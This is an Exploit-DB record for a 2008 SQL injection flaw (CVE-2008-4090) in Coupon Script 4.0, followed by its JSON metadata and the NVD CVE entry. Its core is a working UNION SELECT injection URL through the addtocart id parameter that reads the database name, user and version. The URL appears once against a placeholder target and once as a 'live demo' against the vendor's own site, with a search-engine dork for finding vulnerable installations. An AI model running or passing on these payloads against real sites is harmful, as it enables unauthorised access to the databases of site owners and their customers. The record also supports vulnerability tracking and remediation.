ID EDB-ID:6348
Type exploitdb
Reporter Hussin X
Modified 2008-09-02T00:00:00
Description
Coupon Script 4.0: remote SQL injection through the id parameter of index.php in the addtocart action. CVE-2008-4090. Web application exploit for the PHP platform.
|___________________________________________________|
|
| Coupon Script 4.0 (id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : WwW.Hussin-X.CoM | WwW.tryag.CoM
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script : http://www.couponscript.com/
|
| DorK : inurl:couponsite/index.php?page=
|___________________________________________________|
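Exploit (proof-of-concept request): the id parameter of the addtocart action evidently reaches a SQL query without validation, so the UNION SELECT below reads database(), user() and version(). Remediation is to validate id as an integer and bind it as a query parameter.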
________
www.[target].com/Script/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/*
L!VE DEMO:
_________
http://couponscript.com/couponsite/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/*
____________________________( Greetz )_________________________________
|
| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe
|
| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker
|______________________________________________________________________
Im IRAQi
# milw0rm.com [2008-09-02]
{"id": "EDB-ID:6348", "hash": "f84bf53fa42ba7489a39f0143505e5a6", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Coupon Script 4.0 id Remote SQL Injection Vulnerability", "description": "Coupon Script 4.0 (id) Remote SQL Injection Vulnerability. CVE-2008-4090. Webapps exploit for php platform", "published": "2008-09-02T00:00:00", "modified": "2008-09-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/6348/", "reporter": "Hussin X", "references": [], "cvelist": ["CVE-2008-4090"], "lastseen": "2016-02-01T00:41:29", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2016-02-01T00:41:29"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-4090"]}], "modified": "2016-02-01T00:41:29"}, "vulnersScore": 7.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/6348/", "sourceData": "|___________________________________________________|\n|\n| Coupon Script 4.0 (id) Remote SQL Injection Vulnerability\n|\n|___________________________________________________\n|---------------------Hussin X----------------------|\n|\n| Author: Hussin X\n|\n| Home : WwW.Hussin-X.CoM | WwW.tryag.CoM\n|\n| email: darkangel_g85[at]Yahoo[DoT]com\n|\n|\n|___________________________________________________\n| |\n|\n| script : http://www.couponscript.com/\n|\n| DorK : inurl:couponsite/index.php?page=\n|___________________________________________________|\n\nExploit: \n________\n\n\n\nwww.[target].com/Script/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/*\n\n\n\n\nL!VE 
DEMO:\n_________\n\n\nhttp://couponscript.com/couponsite/index.php?page=addtocart&id=-170/**/union/**/select/**/database(),user(),version(),user(),database(),6,7,user(),9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24/*\n\n\n\n\n\n\n\n____________________________( Greetz )_________________________________\n|\n| All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC\n|\n| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | kadmiwe\n| \n| jiko | FAHD | Iraqihack | mos_chori | str0ke | Ghost Hacker\n|______________________________________________________________________\n \n\n Im IRAQi\n\n# milw0rm.com [2008-09-02]\n", "osvdbidlist": ["47888"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:28", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in index.php in PHP Coupon Script 4.0 allows remote attackers to execute arbitrary SQL commands via the id parameter in an addtocart action, a different vector than CVE-2007-2672.", "modified": "2017-09-29T01:31:00", "id": "CVE-2008-4090", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4090", "published": "2008-09-15T17:12:00", "title": "CVE-2008-4090", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}